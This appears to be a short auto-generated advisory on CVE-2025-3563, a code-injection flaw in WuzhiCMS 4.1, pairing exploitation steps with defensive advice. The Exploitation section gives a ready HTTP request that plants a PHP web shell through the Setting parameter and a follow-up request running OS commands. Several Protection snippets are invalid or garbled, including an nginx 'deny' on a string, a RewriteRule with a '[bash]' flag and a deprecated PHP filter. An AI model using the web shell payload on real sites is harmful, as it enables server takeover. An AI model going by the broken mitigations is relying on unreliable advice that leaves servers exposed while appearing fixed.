How CVE-2025-3563 Works
The vulnerability in WuzhiCMS 4.1 resides in the `/index.php?m=attachment&f=index&_su=wuzhicms&v=set&submit=1` endpoint, specifically within the Setting Handler component. Attackers exploit improper input validation in the `Set` function, where malicious code can be injected via the `Setting` parameter. Due to insufficient sanitization, arbitrary PHP code execution occurs when crafted payloads are processed. Remote attackers leverage this flaw without authentication, enabling server compromise. The public exploit availability increases exploitation risk, as attackers inject commands via HTTP requests, leading to full system control under the web server’s privileges.
DailyCVE Form
Platform: WuzhiCMS
Version: 4.1
Vulnerability: Code Injection
Severity: Critical
Date: 04/29/2025
What Undercode Say:
Exploitation
- Craft a POST request to `/index.php?m=attachment&f=index&_su=wuzhicms&v=set&submit=1` with malicious `Setting` payload:
POST /index.php?m=attachment&f=index&_su=wuzhicms&v=set&submit=1 HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Setting=<?php system($_GET['cmd']); ?>
2. Execute OS commands via:
GET /index.php?cmd=id HTTP/1.1 Host: target.com
Protection
1. Patch by sanitizing `Setting` input:
$setting = filter_input(INPUT_POST, 'Setting', FILTER_SANITIZE_STRING);
2. WAF rule to block suspicious patterns:
location ~ .php$ {
deny "Setting=<?php";
}
3. Disable vulnerable endpoint if unused:
RewriteRule ^index.php\?m=attachment&f=index&_su=wuzhicms&v=set - [bash]
Detection
1. Scan for exploit attempts:
grep -r "Setting=<?php" /var/log/apache2/access.log
2. Monitor file modifications:
find /var/www/html -type f -mtime -1 -ls
3. Check active backdoors:
lsof -i | grep 'php'
Mitigation
1. Immediate actions:
chmod -R 750 /var/www/html
2. Update WuzhiCMS or apply vendor patches.
3. Restrict PHP execution in upload directories:
php_admin_flag engine off
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
